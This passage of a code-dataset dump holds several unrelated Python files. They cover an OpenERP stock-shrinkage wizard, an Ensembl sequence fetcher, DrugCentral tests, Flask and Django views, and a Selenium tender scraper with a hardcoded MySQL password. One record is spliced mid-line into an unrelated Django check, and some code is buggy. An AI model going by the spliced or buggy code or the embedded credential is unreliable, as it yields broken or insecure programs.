str(ide_wizard)\n \n self.write(cr, uid, ids, {\n 'producto': producto[0],\n 'imagen': producto[1],\n 'producto_m2o_id': id_producto,\n 'precio' : producto[3],\n 'unidad_med' : producto[4],\n 'medida_m2o_id' :producto[5],\n 'cantidad_prod' : cantidad_en_ubicacion,\n 'cantidad_mover' : '',\n 'cod_ean13': cod_ean13,\n 'cod_ubicacion': cod_ubicacion,\n 'localizacion_m2o_id': id_locali,\n 'almacen_m2o_id': tienda,\n 'destino_mov_m2o_id': destino,\n 'muestra_destino': muestra_dest,\n 'muestra_localizacion': muestra_local,\n 'clave_ide': clave,\n 'state': 'guardar',\n }, context=context)\n \n this = self.browse(cr, uid, ids)[0]\n return {\n 
'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n }\n else:\n return {\n 'warning' : {\n 'title' : '¡No hay producto!',\n 'message' : 'En la ubicación seleccionada no hay existencia '+\n 'del producto',\n } \n }\n \n else:\n return {\n 'warning' : {\n 'title' : '¡Error! Código de Ubicación',\n 'message' : 'La ubicación NO pertenece a la tienda ' +\n 'seleccionada',\n } \n }\n \n else:\n return {\n 'warning' : {\n 'title' : '¡La Ubicación No Existe!',\n 'message' : 'El codigo de la ubicación no pertenece a ninguna '+\n 'Ubicacion',\n } \n } \n else:\n return {\n 'warning' : {\n 'title' : '¡Corriga Codigo Ubicación!',\n 'message' : 'El código debe contener 13 digitos, sin espacios ni letras' ,\n } \n } \n \n else:\n return {\n 'warning' : {\n 'title' : '¡El Producto No Existe!',\n 'message' : 'El codigo ean13 no pertenece a ningun '+\n 'producto ¡Intente con otro codigo!',\n } \n }\n \n else:\n return {\n 'warning' : {\n 'title' : '¡El Producto ya se Registro!',\n 'message' : 'Ingrese el siguiente codigo de '+\n 'producto, este ya fue registrado',\n } \n }\n \n \n else:\n return {\n 'warning' : {\n 'title' : '¡Corriga Codigo Producto!',\n 'message' : 'El codigo debe contener 13 digitos, sin espacios ni letras' ,\n } \n } \n else:\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n }\n \n else :\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n } \n #--------------------------------------------------------------------------------------------------------------------------------------------------- \n def botonRegresar(self, cr, uid, ids, context = { }):\n \"\"\"\n Función del Botón objeto objeto \"botonRegresar\" con etiqueta \"Regresar\"\n para regresar al estado 'producto' y poder a modificar el producto.\n * Para OpenERP [button]\n * Argumentos OpenERP: [cr, uid, ids, context]\n \"\"\"\n #creacion del objeto\n datos=self.pool.get( self._name ).browse( cr, uid, ids[0] )\n tienda=datos.almacen_m2o_id.id\n destino=datos.destino_mov_m2o_id.id\n codigo=datos.cod_ean13\n muestra=datos.destino_mov_m2o_id.complete_name\n #se rescriben los datos\n self.write(cr, uid, ids, {\n 'almacen_m2o_id': tienda,\n 'destino_mov_m2o_id': destino,\n 'cod_ean13': '',\n 'muestra_destino': muestra,\n 'state': 'producto',\n }, context=context)\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n } \n #---------------------------------------------------------------------------------------------------------------------------------------------------\n def onchange_filtro_almacen( self, cr, uid, ids, almacen_m2o_id) :\n \"\"\"\n Evento OnChange del campo \"almacen_m2o_id\" con etiqueta \"Tienda\" para obtener el filtro de ubicaciones de esa tienda en el campo\n destino_mov_m2o_id con etiqueta \"Ubicacion Destino\".\n * Para OpenERP [onchange]\n * Argumentos OpenERP: [cr, uid, ids]\t\t\t\n @param almacen_m2o_id: (int) 
Manda el valor de la tienda o almacen seleccionado\n @return dict\n \"\"\"\n context =''\n #toma el datos seleccionado\n try:\n id_almacen =str(almacen_m2o_id)\n except :\n return {\n 'value' : {\n 'localizacion_m2o_id' : False,\n 'destino_mov_m2o_id' : False,\n },\n 'domain' : {\n 'localizacion_m2o_id' : [( 'id', '=', '0' )],\n 'destino_mov_m2o_id' : [( 'id', '=', '0' )], \n },\t\t\t\t\n }\n #consulta para obtener el id de la localidad en almacen y el nomnre de la tienda seleccionada\n cr.execute(\n \"\"\"\n SELECT\n s.name\n from stock_warehouse s \n INNER JOIN stock_location se\n ON s.lot_stock_id = se.id\n WHERE s.id= %s\n \"\"\",(id_almacen,))\n almacenes=cr.fetchall()\n \n if almacenes != None and type( almacenes ) in ( list, tuple, dict ):\n d_almacen=almacenes[0]\n ubicacion_seleccionada=d_almacen[0]\n #obtiene el nombre de las tiendas o de almacenes para hacer una comparaciones y obtener la variable con el numero de sucursales\n cr.execute(\n \"\"\"\n SELECT\n s.name\n from stock_warehouse s \n INNER JOIN stock_location se\n ON s.lot_stock_id = se.id\n order by s.id\n \"\"\",)\n lista_tienda=cr.fetchall()\n\n #Se obtiene el numero de tiendas\n rango=len(lista_tienda)\n suma=0\n sucursal=0\n\n for i in range(rango):\n suma=suma + 1\n if ubicacion_seleccionada.find(str(suma)) >= 0:\n sucursal=suma \n\n list_loc_tienda = []\n cr.execute(\n \"\"\"\n SELECT id\n FROM stock_location ls\n WHERE scrap_location = true and\n ls.name like 'Scrapped'\n \"\"\"\n )\n scrapped = cr.fetchone()\n id_scrapped = scrapped[0]\n #Se obtiene el id de las localizaciones virtuales de cada tienda\n cr.execute(\n \"\"\"\n SELECT\n id\n from stock_location ls\n WHERE \n location_id=%s\n and\n scrap_location = true\n order by id\n \"\"\",(id_scrapped,))\n #recorre las lista de localidades\n for id_tienda in cr.fetchall():\n lista=id_tienda[0]\n list_loc_tienda.append(lista) \n\n location_ids = []\n i=5\n #objeto de ubicaciones de almacen\n location_pool = self.pool.get('stock.location')\n for id_tienda in list_loc_tienda:\n id_tienda=int(id_tienda)\n ubicacion_t = location_pool.browse(cr, uid, id_tienda)\n nombre = ubicacion_t.name\n if sucursal>0:\n if nombre.find(\"SM1 Scrap Parent\") >= 0 and sucursal==1 :\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n # print location_ids\n if nombre.find(\"SM2 Scrap Parent\") >= 0 and sucursal==2 :\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n if nombre.find(\"SM3 Scrap Parent\") >= 0 and sucursal==3 :\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n if nombre.find(\"SM4 Scrap Parent\") >= 0 and sucursal==4 :\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n if nombre.find(\"SM5 Scrap Parent\") >= 0 and sucursal==5 :\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n if sucursal>5:\n for i in range(rango):\n i=i+1\n if nombre.find(str(i)) >= 0 and sucursal==i:\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n \n else:\n return {\n 'value' : {\n 'localizacion_m2o_id' : False,\n 'destino_mov_m2o_id' : False,\n },\n 'domain' : {\n 'localizacion_m2o_id' : [( 'id', '=', '0' )],\n 'destino_mov_m2o_id' : [( 'id', '=', '0' )], \n },\n 'warning' : {\n 'title' : '¡Aviso! 
Seleccione otra tienda',\n 'message' : 'La tienda selecciona no tiene asocida ' +\n 'una localidad virtual de merma, caducado o desperdicio ' +\n '¡Deben crearse primero!',\n } \n } \n \n if location_ids != []:\n #se borra el primer valor de tupla que es el padre de las ubicaciones\n del location_ids[0]\n #Validando el retorno de datos encontrados para el filtrado de datos en destino_mov_m2o_id con etiqueta ubicacion destino\n cadena_retorno = ( str ( \"('id','=','0')\" if ( location_ids == [] ) else ( \"('id','in',\" + str( location_ids ) + \")\" ) ) )\n\n #se escribe el id del almacen\n self.write(cr, uid, ids, {'almacen_m2o_id': id_almacen, },)\n #filtrar ubicaciones de tienda seleccionada \n #Retornando domain\n return {\n 'value' : {\n 'localizacion_m2o_id' : False,\n 'destino_mov_m2o_id' : False,\n # 'filtro_ubicaciones' : cadena_retorno,\n },\n \n 'domain' : {\n 'localizacion_m2o_id' : [\n '&',\n eval( cadena_retorno )\n ],\n 'destino_mov_m2o_id' : [\n '&',\n eval( cadena_retorno )\n ], \n },\t\t\t\n }\n else:\n return {\n 'value' : {\n 'localizacion_m2o_id' : False,\n 'destino_mov_m2o_id' : False,\n },\n 'domain' : {\n 'localizacion_m2o_id' : [( 'id', '=', '0' )],\n 'destino_mov_m2o_id' : [( 'id', '=', '0' )], \n },\n 'warning' : {\n 'title' : '¡Aviso! Seleccione otra tienda',\n 'message' : 'Por favor seleccione solo las tiendas existentes ',\n } \n }\n #---------------------------------------------------------------------------------------------------------------------------------------------------\n def botonAceptar(self, cr, uid, ids,context = { }):\n \"\"\"\n Metodo del botón \"aceptar\" para obtener el almacen de la tienda\n \"\"\"\n datos=self.pool.get( self._name ).browse( cr, uid, ids[0] )\n tienda=datos.almacen_m2o_id.id\n destino=datos.destino_mov_m2o_id.id\n self.write(cr, uid, ids, {\n 'almacen_m2o_id': tienda,\n 'destino_mov_m2o_id': destino,\n 'state': 'producto',\n }, context=context)\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n }\n #--------------------------------------------------------------------------------------------------------------------------------------------------- \n def _obtenerIdLogueado( self, cr, uid, ids = None, field_name = None, arg = None, context = None ) :\n \"\"\"\n Función para el campo \"Autor\"\n * Para OpenERP [field.function( empleado_autor )]\n * Argumentos OpenERP: [cr, uid, ids, field_name, arg, context]\n @return dict\n \"\"\"\n result = {}\n for record in self.browse( cr, uid, ids, context ) :\n obj_user = self.pool.get( 'res.users' ).browse( cr, uid, uid )\n nombre_empleado=obj_user.partner_id.name\n result[record.id] = nombre_empleado\n #Retornando los resultados evaluados\n return result\n \n #--------------------------------------------------------------------------------------------------------------------------------------------------- \n def create(self, cr, uid, vals, context = None ):\n \"\"\" \n Método \"create\" que se ejecuta justo antes (o al momento) de CREAR un nuevo registro en OpenERP. 
\n * Argumentos OpenERP: [cr, uid, vals, context] \n @param \n @return bool \n \"\"\"\n nuevo_id = None\n #Creando la clave siguiente para este registro\n almacen=vals['almacen_m2o_id']\n destino=vals['destino_mov_m2o_id']\n nuevo_id = super( merma_wizard_productos, self ).create( cr, uid, vals, context = context )\n return nuevo_id \n #---------------------------------------------------------------------------------------------------------------------------------------------------\n def _obtener_ubicaciones_subquery( self, cr, uid, ids = None, field_name = None, arg = None, context = None ) :\n \"\"\"\n Función para obtener los id's de los almacenes para poder obtener sus ubicaciones\n * Para OpenERP [field.function( ubicaciones_subquery )]\n * Argumentos OpenERP: [cr, uid, context]\n @return dict\n \"\"\"\n almacenes=[]\n #Se realiza una consulta para filtrar los id de todos los stock de entrada de cada tienda,\n cr.execute(\n \"\"\"\n SELECT\n location_id AS id_local\n from stock_location se\n INNER JOIN stock_warehouse s\n ON s.lot_input_id = se.id\n ORDER BY location_id\n \"\"\"\n )\n for registro in cr.fetchall() :\n almacenes.append( registro[0] )\n \n #Validando el retorno de datos encontrados\n cadena_retorno = (\n str ( \"('id','=','0')\" if ( almacenes == [] ) else ( \"('id','in',\" + str( almacenes ) + \")\" ) )\n )\n #Retornando los id's en caso de ser un \"Registro Nuevo\"\n if ( ( field_name == None ) and ( arg == None ) and ( context == None ) ):\n result = cadena_retorno\n #Retornando los id's en caso de \"Edicion de Registro\"\n else :\n result = {}\n for record in self.browse( cr, uid, ids, context ) :\t\t\n result[record.id] = cadena_retorno\n return result \n #--------------------------------------------------------------------------------------------------------------------------------------------------- \n\n\t### /////////////////////////////////////////////////////////////////////////////////////////////////////////////// ###\n\t### ###\n\t### Atributos Básicos del Modelo OpenERP ###\n\t### ###\n\t### /////////////////////////////////////////////////////////////////////////////////////////////////////////////// ###\n\n #Nombre del Modelo\n _name = 'merma_wizard_productos'\n #Descripcion\n _description = 'merma_wizard_productos'\n\n _columns = {\n \n # ========================== Campos OpenERP Básicos (integer, char, text, float, etc...) 
======================== #\n 'cont':fields.char(\"Contador\", size=10, required=False),\n 'clave_ide' : fields.char( 'Clave de Lista' ),\n 'cod_ean13':fields.char(\"Código Producto\", size=13, required=False),\n 'cod_ubicacion':fields.char(\"Código Ubicación\", size=13, required=False),\n 'muestra_destino':fields.char(\"Destino\", required=False),\n 'muestra_localizacion':fields.char(\"Localizacion\", required=False),\n 'producto': fields.char('Nombre', size=80, readonly=True),\n 'imagen': fields.binary( 'Imagen', readonly=True, help='photo'),\n 'state': fields.selection([\n ('tienda', ' Tienda'),\n ('producto', 'Producto'),\n ('guardar', 'Guardar')\n ]),\n # 'filtro_ubicaciones':fields.text(\"Lista\", required=False),\n 'cantidad_prod':fields.float('Cantidad de Producto', required=False),\n 'cantidad_mover':fields.float('Cantidad a Mover', required=False),\n 'unidad_med':fields.char(\"Unidad de Medida\", required=False),\n 'precio':fields.float('Precio', required=False),\n # ====================================== Relaciones OpenERP [one2many](o2m) ====================================== #\n\n 'almacen_m2o_id': fields.many2one(\n 'stock.warehouse',\n 'Tienda'\n ),\n\n 'destino_mov_m2o_id': fields.many2one(\n 'stock.location',\n 'Ubicacion Destino'\n ),\n \n 'localizacion_m2o_id': fields.many2one(\n 'stock.location',\n 'Localización'\n ),\n \n 'producto_m2o_id': fields.many2one(\n 'product.product',\n 'Id Producto'\n ),\n \n 'medida_m2o_id': fields.many2one('product.uom', 'Unidad de Medida'),\n \n # ====================================== Function ====================================== # \n 'empleado_autor' : fields.function(\n _obtenerIdLogueado,\n type = 'text',\n method = True,\n string = 'Autor',\n change_default = True,\n store = False,\n readonly = True,\n required = False\n ),\n #Campos function para definir el domain del campo almacen_id (no se almacena)\n 'ubicaciones_subquery' : fields.function(\n _obtener_ubicaciones_subquery,\n type = 'text',\n method = True,\n string = 'SubqueryUbicaciones',\n change_default = True,\n store = False,\n readonly = True,\n required = False\n ),\n \n }\n\n #Valores por defecto de los elementos del arreglo [_columns]\n _defaults = {\n 'state': 'tienda',\n }\n \n #Reestricciones desde código\n _constraints = [ ]\n\n #Reestricciones desde BD\n _sql_constraints = [ ]\n\nmerma_wizard_productos()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"python/alicia/sm_merma/secciones/wizard_productos/merma_wizard_productos.py","file_name":"merma_wizard_productos.py","file_ext":"py","file_size_in_byte":33847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"616613038","text":"import requests, sys\nimport argparse as ap \nfrom Bio import SeqIO\nfrom pathlib import Path\n\ndef parse_arguments(parser=None): \n '''Parsers for chromosome, start and end coordinates, \n assumign we're doing human sequences. '''\n if not parser: \n parser = ap.ArgumentParser()\n \n parser = ap.ArgumentParser(description=__doc__)\n parser.add_argument(\"chromosome\",\n help=\"Chromosome number of the sequence\")\n parser.add_argument(\"seq_start\", type=int, \n help=\"start coordinate\")\n parser.add_argument(\"seq_stop\", \n type=int, help=\"end coordinate\")\n args = parser.parse_args()\n\n return args\n\n\ndef seq_retriever(args):\n '''Accessing the Ensembl-REST API to retrieve \n the sequences with the arguments we take \n from the command line. 
''' \n\n server = \"https://rest.ensembl.org\"\n # region endpoint: chromosome:start..end on the forward (1) strand; the URL must contain no whitespace\n ext = f\"/sequence/region/human/{args.chromosome}:{args.seq_start}..{args.seq_stop}:1?\"\n print(\"Retrieving sequence...\")\n r = requests.get(server+ext, \n headers={\"Content-Type\" : \"text/plain\"})\n\n if not r.ok: \n r.raise_for_status()\n sys.exit()\n\n return r.text\n\ndef seq_writer(r_text, args): \n '''Write the retrieved sequence to seq_file.fasta in FASTA format.''' \n print(\"Writing sequence to file...\") \n with open(\"seq_file.fasta\", \"w\") as f: \n # Write the header line. \n f.write(f\">human | {args.chromosome} | {args.seq_start} to {args.seq_stop}\\n\")\n # Wrap the sequence at 80 characters per line. \n for i in range(0, len(r_text), 80): \n f.write(f\"{r_text[i : i + 80]}\\n\")\n print(\"\\nFile written to seq_file.fasta\")\n\n\ndef main(): \n print(\"Sequence address taken.\\nStarting sequence retrieval...\")\n args = parse_arguments()\n r_text = seq_retriever(args)\n seq_writer(r_text, args)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/seqio1.py","file_name":"seqio1.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"140498105","text":"import os\nimport tempfile\nimport unittest\n\nfrom kg_covid_19.transform_utils.drug_central.drug_central import \\\n parse_drug_central_line, unzip_and_get_tclin_tchem, tsv_to_dict\nfrom kg_covid_19.utils.transform_utils import parse_header\nfrom parameterized import parameterized\n\n\nclass TestDrugCentral(unittest.TestCase):\n\n def setUp(self) -> None:\n self.dti_fh = open(\n 'tests/resources/drug_central/drug.target.interaction_SNIPPET.tsv', 'rt')\n\n @parameterized.expand([\n ('STRUCT_ID', '4'),\n ('TARGET_NAME', 'Sodium channel protein type 4 subunit alpha'),\n ('TARGET_CLASS', 'Ion channel'),\n ('ACCESSION', 'P35499'),\n ('GENE', 'SCN4A'),\n ('SWISSPROT', 'SCN4A_HUMAN'),\n ('ACT_VALUE', ''),\n ('ACT_UNIT', ''),\n ('ACT_TYPE', ''),\n ('ACT_COMMENT', ''),\n ('ACT_SOURCE', 'WOMBAT-PK'),\n ('RELATION', ''),\n ('MOA', '1'),\n ('MOA_SOURCE', 'CHEMBL'),\n ('ACT_SOURCE_URL', ''),\n ('MOA_SOURCE_URL', 'https://www.ebi.ac.uk/chembl/compound/inspect/CHEMBL1200749'),\n ('ACTION_TYPE', 'BLOCKER'),\n ('TDL', 'Tclin'),\n ('ORGANISM', 'Homo sapiens')])\n def test_parse_drug_central_line(self, key, value):\n header = parse_header(self.dti_fh.readline())\n line = self.dti_fh.readline()\n parsed = parse_drug_central_line(line, header)\n self.assertTrue(key in parsed)\n self.assertEqual(value, parsed[key])\n\n @parameterized.expand([\n ('tclin', 'tests/resources/drug_central/tclin_SNIPPET.tsv', 2, 'Q13131', 'drug_name', 'cepharanthine'),\n ('tchem', 'tests/resources/drug_central/tchem_SNIPPET.tsv', 2, 'P21917', 'drug_name', 'brexpiprazole'),\n ])\n def test_tsv_to_dict(self, name, file, expected_rows, test_key, sub_key, test_val) -> None:\n ret_val = tsv_to_dict(file, 'uniprot')\n self.assertTrue(isinstance(ret_val, dict))\n self.assertEqual(len(ret_val), expected_rows)\n self.assertTrue(isinstance(ret_val, dict))\n self.assertTrue(test_key in ret_val)\n self.assertTrue(sub_key in ret_val.get(test_key))\n self.assertEqual(ret_val[test_key][sub_key], test_val)\n\n def test_unzip_and_get_tclin_tchem(self) -> None:\n zip_file = \"tests/resources/drug_central/test.zip\"\n tempdir = tempfile.mkdtemp()\n (tclin, tchem) = unzip_and_get_tclin_tchem(zip_file, tempdir)\n self.assertTrue(isinstance(tclin, str))\n self.assertTrue(isinstance(tchem, str))\n self.assertEqual(tclin, 
os.path.join(tempdir, 'tclin_05122020.tsv'))\n self.assertEqual(tchem, os.path.join(tempdir, 'tchem_drugs_05122020.tsv'))\n\n","sub_path":"tests/test_drug_central.py","file_name":"test_drug_central.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"502294130","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as norm\nimport matplotlib.ticker as ticker\nimport math \n\n\ndef p(N,e,t,a,b):\n n=N\n S=[]\n E=[]\n ecount=0\n Ebar = []\n std = 0\n \n while True:\n for i in range(5):\n S=np.random.uniform(a,b,n) \n sum=0.0\n for x in S:\n sum = sum + math.exp(t*x)\n \n E.append(float(sum)/float(n))\n else:\n std = np.std(E)\n if(std arrow.utcnow():\n raise ValidationError(\n \" you can not generate future report\"\n )\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"report/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"362839255","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 9 16:07:38 2017\n\n@author: Master Chief\n\"\"\"\n\nimport scipy as sp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as font_manager\n\nfont_path = 'C:\\Windows\\Fonts\\consola.ttf'\nfont_prop = font_manager.FontProperties(fname=font_path, size=10)\n\ntitle_font = {'fontname':'Arial', 'size':'16', 'color':'black', 'weight':'normal',\n 'verticalalignment':'bottom'}\n\nfont = {'fontname':'Comic Sans MS','fontsize':14}\n\n# Creamos un polinomio\npolinomio = [1.,-6.4,6.45,20.538,-31.752] # polinomio = x^4 - 6.4 x^3 + 6.45 x^2 + 20.538 x - 31.752\n\n\ndef buscaraiz(f,a,b,dx):\n x1 = a; f1 = f(a)\n x2 = a + dx; f2 = f(x2)\n while f1*f2 > 0.0:\n if x1 >= b: return None#,None\n x1 = x2; f1 = f2\n x2 = x1 + dx; f2 = f(x2)\n else:\n return x1,x2\n \n\ndef p(x):\n y = x**3 - 10 * x**2 + 5\n return y\n\nx = np.linspace(-1,1.5,100)\n\na, b, dx = (-1.,0, 0.2)\n\nx1, x2 = buscaraiz(p,a,b,dx)\n\nraiz=sp.optimize.bisect(p, x1, x2)\nprint(raiz)\n\nplt.plot(raiz,0,'bo', label='raíz estimada')\nplt.plot(x,p(x), label='$x^{3} - 10 * x^{2} + 5$')\nplt.axhline(y=0, lw=0.7, ls='dashed')\nplt.axvline(x=0, lw=0.7, ls='dashed')\nplt.axis([-1,1.5,-7.5,6])\nplt.title('Se desea calcular las raíces de esta función',**font)\nplt.legend(loc=1)\nplt.show()\n#print(raices)","sub_path":"Tema 2 - Operaciones matematicas basicas/Codigos python/03 Raices/raices_python_scipy_02.py","file_name":"raices_python_scipy_02.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"522867605","text":"# coding=utf-8\nfrom django.shortcuts import get_object_or_404\nfrom .models import Profile\n\n\ndef profile(request):\n \"\"\"Получает данные пользователя.\"\"\"\n user = request.user\n if user.is_active:\n profile = get_object_or_404(Profile, user_id=user.id)\n return {\n 'user_name': user.username,\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'email': user.email,\n 'avatar': profile.avatar,\n 'phone': profile.phone,\n 'city': profile.city,\n 'sex': profile.sex,\n 'birthday': profile.birthday\n }\n else:\n return {\n 'user_name': 'Аноним',\n 'avatar': None\n 
}\n","sub_path":"src/gorodkirov/users/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"355322291","text":"\n# ======================================================\n# @Author : Daniel                 \n# @Time : 2020.6.20\n# @Desc : 用户视图\n# ======================================================\n\nfrom flask import request, render_template, redirect, url_for\nfrom utils.check_login import is_login\nfrom .models import Role\nfrom .user_views import user_bp\n\n\n@user_bp.route('/role/', methods=['GET'])\n@is_login\ndef role_list():\n \"\"\"\n 角色信息列表\n :return:\n \"\"\"\n if request.method == 'GET':\n # 第几页\n page = int(request.args.get('page', 1))\n # 每页的数据\n page_num = int(request.args.get('page_num', 10))\n # 查询当前第几页的多少条数据\n paginate = Role.query.order_by('r_id').paginate(page, page_num)\n\n # 获取某页的具体数据\n roles = paginate.items\n\n return render_template('role/role_list.html', roles=roles, paginate=paginate)\n\n\n@user_bp.route('/role_edit/', methods=['GET', 'POST'])\n@is_login\ndef edit_role():\n \"\"\"\n 添加编辑角色\n :return:\n \"\"\"\n if request.method == 'GET':\n r_id = request.args.get('r_id', None)\n\n if r_id:\n role = Role.query.get(r_id=int(r_id))\n else:\n role = None\n\n return render_template('role/role_edit.html', role=role)\n\n if request.method == 'POST':\n r_name = request.form['r_name']\n\n if 'r_id' in request.form and request.form['r_id']:\n role = Role.query.get(r_id=int(request.form['r_id']))\n role.r_name = r_name\n\n else:\n r = Role.query.filter_by(r_name=r_name).first()\n\n if r:\n msg = '角色名称不能重复!!'\n\n return render_template('role/role_edit.html', msg=msg)\n\n role = Role(name=r_name)\n\n role.save()\n\n # 重定向到 roles_list 方法\n return redirect(url_for('user.role_list'))","sub_path":"App/role_views.py","file_name":"role_views.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"104628044","text":"import os, time, re, redis, pymysql,time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom lxml import etree\r\nfrom city_data import get_city_dict\r\nfrom Regular_Expression import regularExpression\r\n\r\n# os.system('cd /Users/杰/AppData/Local/Google/Chrome/Application')\r\n# os.system('chrome.exe --remote-debugging-port=9222 -user-data-dir=\"c:/selenium/automationprofile\"')\r\n\r\nclass China_unicom(object):\r\n\tdef __init__(self):\r\n\t\tself.city_dict = get_city_dict()\r\n\t\tself.pattern01 = r'服务区域:(.*?)<'\r\n\t\tself.pattern02 = r'服务地点:(.*?)<'\r\n\t\tself.pattern03 = r'服务地址:(.*?)<'\r\n\t\tself.pattern04 = r'采.*?购.*?人(.*?)<'\r\n\t\tself.pattern05 = r'比.*?选.*?人:(.*?)<'\r\n\t\tself.pattern08 = r'地址:(.*?)<'\r\n\t\tself.pattern06 = r'联系地址:(.*?)<'\r\n\t\tself.pattern07 = r'详细地址:(.*?)<'\r\n\t\t# 正则表达式的规则列表\r\n\t\tself.pattern_list = [self.pattern01, self.pattern02, self.pattern03, self.pattern04, self.pattern08, self.pattern05, self.pattern06, self.pattern07]\r\n\t\t# self._arguments = []\r\n\t\tself.base_url = 'http://www.chinaunicombidding.cn'\r\n\t\tself.chrome_options = Options()\r\n\t\t# chrome_options.add_experimental_option(\"debuggerAddress\",\"127.0.0.1:9222\")\r\n\t\tself.chrome_options.add_argument('disable-infobars')\r\n\t\tself.chrome_options.add_experimental_option('excludeSwitches', ['enable-automation'])\r\n\t\t# self.option = 
webdriver.ChromeOptions()\r\n\t\tself.going_to_crawl_bid = '{}&type=1'\r\n\t\tself.going_to_crawl_result = '{}&type=2'\r\n\t\tself.going_to_crawl_single = '{}&type=3'\r\n\t\tself.duplicate_part = 'http://www.chinaunicombidding.cn/jsp/cnceb/web/info1/infoList.jsp?page='\r\n\r\n\t\tself.conn = pymysql.connect(host='0.0.0.0',\r\n\t\t\t\t\t\t\t\t\tuser='root',\r\n\t\t\t\t\t\t\t\t\tpassword='jiayou875',\r\n\t\t\t\t\t\t\t\t\tdatabase='zb_data',\r\n\t\t\t\t\t\t\t\t\t# database='test_demo',\r\n\t\t\t\t\t\t\t\t\tport=3306,\r\n\t\t\t\t\t\t\t\t\tcharset='utf8')\r\n\t\tself.cur = self.conn.cursor()\r\n\r\n\t\tpool = redis.ConnectionPool(host='0.0.0.0', port=6379, db=15)\r\n\t\tself.r = redis.Redis(connection_pool=pool)\r\n\t\t# 转换成localtime\r\n\t\tnow_time = '%.0f' % time.time()\r\n\t\ttime_local = time.localtime(int(now_time))\r\n\t\t# 转换成新的时间格式(2016-05-05 20:28:54)\r\n\t\t# dt = time.strftime(\"%Y-%m-%d %H:%M:%S\",time_local)\r\n\t\tself.dt = time.strftime(\"%Y-%m-%d\", time_local)\r\n\r\n\r\n\tdef upload_items(self, items):\r\n\t\tif items['addr_id'] == '':\r\n\t\t\titems['addr_id'] = '100'\r\n\t\ttry:\r\n\t\t\tif items['addr_id'] != '' and items['title'] != '' and items['url'] != '' and items['intro'] != '' and items[\r\n\t\t\t\t'web_time'] != '':\r\n\t\t\t\titems['web_time'] = int(time.mktime(time.strptime(items['web_time'], \"%Y-%m-%d\")))\r\n\t\t\t\t# 正式上传到服务器\r\n\t\t\t\tsql = \"INSERT INTO ztb_py_data (catid,title,style,addtime,adddate,areaid,linkurl,content) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s');\" % (\r\n\t\t\t\t\titems['type_id'], items['title'], items['source_name'], items['time'], items['web_time'],\r\n\t\t\t\t\titems['addr_id'],\r\n\t\t\t\t\titems['url'], pymysql.escape_string(items['intro']))\r\n\t\t\t\ttime.sleep(0.1)\r\n\t\t\t\tself.cur.execute(sql)\r\n\t\t\t\tself.conn.commit()\r\n\t\t\t\tself.r.hincrby(self.dt, items['source_name'])\r\n\r\n\t\t\t\t# 单机测试\r\n\t\t\t\t# sql = \"INSERT INTO winkboy (catid,title,style,addtime,adddate,areaid,linkurl,content) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s');\" % ( items['type_id'], items['title'], items['source_name'], items['time'], items['web_time'], items['addr_id'], items['url'], pymysql.escape_string(items['intro']))\r\n\t\t\t\t# self.cur.execute(sql)\r\n\t\t\t\t# self.conn.commit()\r\n\r\n\t\t\telse:\r\n\t\t\t\ttry:\r\n\t\t\t\t\titems['web_time'] = int(time.mktime(time.strptime(items['web_time'], 